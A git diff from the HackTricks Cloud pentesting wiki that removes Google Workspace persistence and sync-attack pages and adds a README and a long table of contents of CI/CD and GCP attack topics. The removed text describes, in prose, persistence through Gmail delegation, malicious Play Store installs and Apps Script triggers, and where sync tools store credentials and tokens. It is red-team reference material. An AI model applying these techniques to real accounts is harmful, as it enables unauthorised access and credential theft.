- -#### Step 1: Turn on Gmail delegation for your users - -**Before you begin:** To apply the setting for certain users, put their accounts in an [organizational unit](https://support.google.com/a/topic/1227584). - -1. [Sign in](https://admin.google.com/) to your [Google Admin console](https://support.google.com/a/answer/182076). - - Sign in using an _administrator account_, not your current account CarlosPolop@gmail.com -2. In the Admin console, go to Menu ![](https://storage.googleapis.com/support-kms-prod/JxKYG9DqcsormHflJJ8Z8bHuyVI5YheC0lAp)![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)![](https://storage.googleapis.com/support-kms-prod/ocGtUSENh4QebLpvZcmLcNRZyaTBcolMRSyl) **Apps**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Google Workspace**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Gmail**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**User settings**. -3. To apply the setting to everyone, leave the top organizational unit selected. Otherwise, select a child [organizational unit](https://support.google.com/a/topic/1227584). -4. Click **Mail delegation**. -5. Check the **Let users delegate access to their mailbox to other users in the domain** box. -6. (Optional) To let users specify what sender information is included in delegated messages sent from their account, check the **Allow users to customize this setting** box. -7. Select an option for the default sender information that's included in messages sent by delegates: - * **Show the account owner and the delegate who sent the email**—Messages include the email addresses of the Gmail account owner and the delegate. - * **Show the account owner only**—Messages include the email address of only the Gmail account owner. The delegate email address is not included. -8. 
(Optional) To let users add a group in Groups as a delegate, check the **Allow users to grant their mailbox access to a Google group** box. -9. Click **Save**. If you configured a child organizational unit, you might be able to **Inherit** or **Override** a parent organizational unit's settings. -10. (Optional) To turn on Gmail delegation for other organizational units, repeat steps 3–9. - -Changes can take up to 24 hours but typically happen more quickly. [Learn more](https://support.google.com/a/answer/7514107) - -#### Step 2: Have users set up delegates for their accounts - -After you turn on delegation, your users go to their Gmail settings to assign delegates. Delegates can then read, send, and receive messages on behalf of the user. - -For details, direct users to [Delegate and collaborate on email](https://support.google.com/a/users/answer/138350). - -
- -
- -From a regular suer, check here the instructions to try to delegate your access - -(Info copied [**from the docs**](https://support.google.com/mail/answer/138350)) - -You can add up to 10 delegates. - -If you're using Gmail through your work, school, or other organization: - -* You can add up to 1000 delegates within your organization. -* With typical use, 40 delegates can access a Gmail account at the same time. -* If you use automated processes, such as APIs or browser extensions, a few delegates can access a Gmail account at the same time. - -1. On your computer, open [Gmail](https://mail.google.com/). You can't add delegates from the Gmail app. -2. In the top right, click Settings ![Settings](https://lh3.googleusercontent.com/p3J-ZSPOLtuBBR_ofWTFDfdgAYQgi8mR5c76ie8XQ2wjegk7-yyU5zdRVHKybQgUlQ=w36-h36) ![and then](https://lh3.googleusercontent.com/3_l97rr0GvhSP2XV5OoCkV2ZDTIisAOczrSdzNCBxhIKWrjXjHucxNwocghoUa39gw=w36-h36) **See all settings**. -3. Click the **Accounts and Import** or **Accounts** tab. -4. In the "Grant access to your account" section, click **Add another account**. If you’re using Gmail through your work or school, your organization may restrict email delegation. If you don’t see this setting, contact your admin. - * If you don't see Grant access to your account, then it's restricted. -5. Enter the email address of the person you want to add. If you’re using Gmail through your work, school, or other organization, and your admin allows it, you can enter the email address of a group. This group must have the same domain as your organization. External members of the group are denied delegation access.\ - \ - **Important:** If the account you delegate is a new account or the password was reset, the Admin must turn off the requirement to change password when you first sign in. - - * [Learn how an Admin can create a user](https://support.google.com/a/answer/33310). 
- * [Learn how an Admin can reset passwords](https://support.google.com/a/answer/33319). - - 6\. Click **Next Step** ![and then](https://lh3.googleusercontent.com/QbWcYKta5vh_4-OgUeFmK-JOB0YgLLoGh69P478nE6mKdfpWQniiBabjF7FVoCVXI0g=h36) **Send email to grant access**. - - The person you added will get an email asking them to confirm. The invitation expires after a week. - - If you added a group, all group members will become delegates without having to confirm. - - Note: It may take up to 24 hours for the delegation to start taking effect. - -
- -## Persistence via Android App - -If you have a **session inside victims google account** you can browse to the **Play Store** and might be able to **install malware** you have already uploaded to the store directly **to the phone** to maintain persistence and access the victims phone. - -## **Persistence via** App Scripts - -You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**. For more information about how to do this check: - -{% content-ref url="gws-google-platforms-phishing/gws-app-scripts.md" %} -[gws-app-scripts.md](gws-google-platforms-phishing/gws-app-scripts.md) -{% endcontent-ref %} - -## References - -* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic -* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite? - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md b/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md deleted file mode 100644 index 30bbf4d6a..000000000 --- a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md +++ /dev/null @@ -1,87 +0,0 @@ -# GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## GCPW - Google Credential Provider for Windows - -This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will store **tokens** to access Google Workspace in some places in the PC: Disk, memory & the registry... it's even possible to obtain the **clear text password**. - -{% hint style="success" %} -Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCPW**, get information about the configuration and **even tokens**. -{% endhint %} - -Find more information about this in: - -{% content-ref url="gcpw-google-credential-provider-for-windows.md" %} -[gcpw-google-credential-provider-for-windows.md](gcpw-google-credential-provider-for-windows.md) -{% endcontent-ref %} - -## GCSD - Google Cloud Directory Sync - -This is a tool that can be used to **sync your active directory users and groups to your Workspace** (and not the other way around by the time of this writing). - -It's interesting because it's a tool that will require the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time. - -{% hint style="success" %} -Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**. -{% endhint %} - -Find more information about this in: - -{% content-ref url="gcds-google-cloud-directory-sync.md" %} -[gcds-google-cloud-directory-sync.md](gcds-google-cloud-directory-sync.md) -{% endcontent-ref %} - -## GPS - Google Password Sync - -This is the binary and service that Google offers in order to **keep synchronized the passwords of the users between the AD** and Workspace. 
Every-time a user changes his password in the AD, it's set to Google. - -It gets installed in `C:\Program Files\Google\Password Sync` where you can find the binary `PasswordSync.exe` to configure it and `password_sync_service.exe` (the service that will continue running). - -{% hint style="success" %} -Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even the passwords and encrypted credentials**. -{% endhint %} - -Find more information about this in: - -{% content-ref url="gps-google-password-sync.md" %} -[gps-google-password-sync.md](gps-google-password-sync.md) -{% endcontent-ref %} - -## Admin Directory Sync - -The main difference between this way to synchronize users with GCDS is that GCDS is done manually with some binaries you need to download and run while **Admin Directory Sync is serverless** managed by Google in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories). - -Find more information about this in: - -{% content-ref url="gws-admin-directory-sync.md" %} -[gws-admin-directory-sync.md](gws-admin-directory-sync.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
diff --git a/src/README.md b/src/README.md
new file mode 100644
index 000000000..e8b2b0355
--- /dev/null
+++ b/src/README.md
@@ -0,0 +1,36 @@
+# HackTricks Cloud
+
+Reading time: {{ #reading_time }}
+
+{{#include ./banners/hacktricks-training.md}}
+
+
+
+_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
+
+> [!TIP]
+> Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news.
+
+### **Pentesting CI/CD Methodology**
+
+**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:**
+
+[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
+
+### Pentesting Cloud Methodology
+
+**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:**
+
+[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md)
+
+### License & Disclaimer
+
+**Check them in:**
+
+[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq)
+
+### Github Stats
+
+![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg)
+
+{{#include ./banners/hacktricks-training.md}}
diff --git a/src/SUMMARY.md b/src/SUMMARY.md
new file mode 100644
index 000000000..f3c2f74f8
--- /dev/null
+++ b/src/SUMMARY.md
@@ -0,0 +1,503 @@ +# SUMMARY.md + +# 👽 Welcome! + +- [HackTricks Cloud](README.md) +- [About the Author$$external:https://book.hacktricks.xyz/welcome/about-the-author$$]() +- [HackTricks Values & faq$$external:https://book.hacktricks.xyz/welcome/hacktricks-values-and-faq$$]() + +# 🏭 Pentesting CI/CD + +- [Pentesting CI/CD Methodology](pentesting-ci-cd/pentesting-ci-cd-methodology.md) +- [Github Security](pentesting-ci-cd/github-security/README.md) + - [Abusing Github Actions](pentesting-ci-cd/github-security/abusing-github-actions/README.md) + - [Gh Actions - Artifact Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md) + - [GH Actions - Cache Poisoning](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md) + - [Gh Actions - Context Script Injections](pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md) + - [Accessible Deleted Data in Github](pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md) + - [Basic Github Information](pentesting-ci-cd/github-security/basic-github-information.md) +- [Gitea Security](pentesting-ci-cd/gitea-security/README.md) + - [Basic Gitea Information](pentesting-ci-cd/gitea-security/basic-gitea-information.md) +- [Concourse Security](pentesting-ci-cd/concourse-security/README.md) + - [Concourse Architecture](pentesting-ci-cd/concourse-security/concourse-architecture.md) + - [Concourse Lab Creation](pentesting-ci-cd/concourse-security/concourse-lab-creation.md) + - [Concourse Enumeration & Attacks](pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md) +- [CircleCI Security](pentesting-ci-cd/circleci-security.md) +- [TravisCI Security](pentesting-ci-cd/travisci-security/README.md) + - [Basic TravisCI Information](pentesting-ci-cd/travisci-security/basic-travisci-information.md) +- [Jenkins Security](pentesting-ci-cd/jenkins-security/README.md) + - [Basic Jenkins 
Information](pentesting-ci-cd/jenkins-security/basic-jenkins-information.md) + - [Jenkins RCE with Groovy Script](pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md) + - [Jenkins RCE Creating/Modifying Project](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md) + - [Jenkins RCE Creating/Modifying Pipeline](pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md) + - [Jenkins Arbitrary File Read to RCE via "Remember Me"](pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md) + - [Jenkins Dumping Secrets from Groovy](pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md) +- [Apache Airflow Security](pentesting-ci-cd/apache-airflow-security/README.md) + - [Airflow Configuration](pentesting-ci-cd/apache-airflow-security/airflow-configuration.md) + - [Airflow RBAC](pentesting-ci-cd/apache-airflow-security/airflow-rbac.md) +- [Terraform Security](pentesting-ci-cd/terraform-security.md) +- [Atlantis Security](pentesting-ci-cd/atlantis-security.md) +- [Cloudflare Security](pentesting-ci-cd/cloudflare-security/README.md) + - [Cloudflare Domains](pentesting-ci-cd/cloudflare-security/cloudflare-domains.md) + - [Cloudflare Zero Trust Network](pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md) +- [Okta Security](pentesting-ci-cd/okta-security/README.md) + - [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md) +- [Serverless.com Security](pentesting-ci-cd/serverless.com-security.md) +- [Supabase Security](pentesting-ci-cd/supabase-security.md) +- [Ansible Tower / AWX / Automation controller Security](pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md) +- [Vercel Security](pentesting-ci-cd/vercel-security.md) +- [TODO](pentesting-ci-cd/todo.md) + +# ⛈️ Pentesting Cloud + +- [Pentesting Cloud Methodology](pentesting-cloud/pentesting-cloud-methodology.md) +- [Kubernetes 
Pentesting](pentesting-cloud/kubernetes-security/README.md) + - [Kubernetes Basics](pentesting-cloud/kubernetes-security/kubernetes-basics.md) + - [Pentesting Kubernetes Services](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md) + - [Kubelet Authentication & Authorization](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md) + - [Exposing Services in Kubernetes](pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md) + - [Attacking Kubernetes from inside a Pod](pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md) + - [Kubernetes Enumeration](pentesting-cloud/kubernetes-security/kubernetes-enumeration.md) + - [Kubernetes Role-Based Access Control(RBAC)](pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md) + - [Abusing Roles/ClusterRoles in Kubernetes](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md) + - [Pod Escape Privileges](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) + - [Kubernetes Roles Abuse Lab](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md) + - [Kubernetes Namespace Escalation](pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md) + - [Kubernetes External Secret Operator](pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md) + - [Kubernetes Pivoting to Clouds](pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md) + - [Kubernetes Network Attacks](pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md) + - [Kubernetes Hardening](pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md) + - [Kubernetes SecurityContext(s)](pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md) + - [Kubernetes OPA 
Gatekeeper](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md) + - [Kubernetes OPA Gatekeeper bypass](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md) + - [Kubernetes Kyverno](pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md) + - [Kubernetes Kyverno bypass](pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md) + - [Kubernetes ValidatingWebhookConfiguration](pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md) +- [GCP Pentesting](pentesting-cloud/gcp-security/README.md) + - [GCP - Basic Information](pentesting-cloud/gcp-security/gcp-basic-information/README.md) + - [GCP - Federation Abuse](pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md) + - [GCP - Permissions for a Pentest](pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md) + - [GCP - Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/README.md) + - [GCP - App Engine Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md) + - [GCP - Artifact Registry Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md) + - [GCP - Cloud Build Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md) + - [GCP - Cloud Functions Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md) + - [GCP - Cloud Run Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md) + - [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md) + - [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) + - [GCP - Compute Post 
Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md) + - [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md) + - [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md) + - [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md) + - [GCP - Logging Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md) + - [GCP - Monitoring Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md) + - [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md) + - [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) + - [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md) + - [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md) + - [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md) + - [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md) + - [GCP - Apikeys Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md) + - [GCP - AppEngine Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md) + - [GCP - Artifact Registry Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md) + - [GCP - Batch Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md) + - [GCP - BigQuery 
Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md) + - [GCP - ClientAuthConfig Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md) + - [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md) + - [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) + - [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md) + - [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) + - [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md) + - [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md) + - [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md) + - [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md) + - [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md) + - [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md) + - [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md) + - [GCP - Orgpolicy Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md) + - [GCP - Pubsub Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md) + - [GCP - Resourcemanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md) + - [GCP - Run Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md) + - [GCP - Secretmanager 
Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md) + - [GCP - Serviceusage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md) + - [GCP - Sourcerepos Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md) + - [GCP - Storage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md) + - [GCP - Workflows Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md) + - [GCP - Generic Permissions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md) + - [GCP - Network Docker Escape](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md) + - [GCP - local privilege escalation ssh pivoting](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) + - [GCP - Persistence](pentesting-cloud/gcp-security/gcp-persistence/README.md) + - [GCP - API Keys Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md) + - [GCP - App Engine Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md) + - [GCP - Artifact Registry Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md) + - [GCP - BigQuery Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md) + - [GCP - Cloud Functions Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md) + - [GCP - Cloud Run Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md) + - [GCP - Cloud Shell Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md) + - [GCP - Cloud SQL Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md) + - [GCP - Compute 
Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md) + - [GCP - Dataflow Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md) + - [GCP - Filestore Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md) + - [GCP - Logging Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md) + - [GCP - Secret Manager Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md) + - [GCP - Storage Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md) + - [GCP - Token Persistance](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md) + - [GCP - Services](pentesting-cloud/gcp-security/gcp-services/README.md) + - [GCP - AI Platform Enum](pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md) + - [GCP - API Keys Enum](pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md) + - [GCP - App Engine Enum](pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md) + - [GCP - Artifact Registry Enum](pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md) + - [GCP - Batch Enum](pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md) + - [GCP - Bigquery Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md) + - [GCP - Bigtable Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md) + - [GCP - Cloud Build Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md) + - [GCP - Cloud Functions Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md) + - [GCP - Cloud Run Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md) + - [GCP - Cloud Shell Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md) + - [GCP - Cloud SQL Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md) + - [GCP - Cloud Scheduler 
Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md)
+ - [GCP - Compute Enum](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md)
+ - [GCP - Compute Instances](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md)
+ - [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md)
+ - [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md)
+ - [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md)
+ - [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md)
+ - [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md)
+ - [GCP - Firebase Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md)
+ - [GCP - Firestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md)
+ - [GCP - IAM, Principals & Org Policies Enum](pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md)
+ - [GCP - KMS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md)
+ - [GCP - Logging Enum](pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md)
+ - [GCP - Memorystore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md)
+ - [GCP - Monitoring Enum](pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md)
+ - [GCP - Pub/Sub Enum](pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md)
+ - [GCP - Secrets Manager Enum](pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md)
+ - [GCP - Security Enum](pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md)
+ - [GCP - Source Repositories Enum](pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md)
+ - [GCP - Spanner Enum](pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md)
+ - [GCP - Stackdriver
Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md)
+ - [GCP - Storage Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md)
+ - [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md)
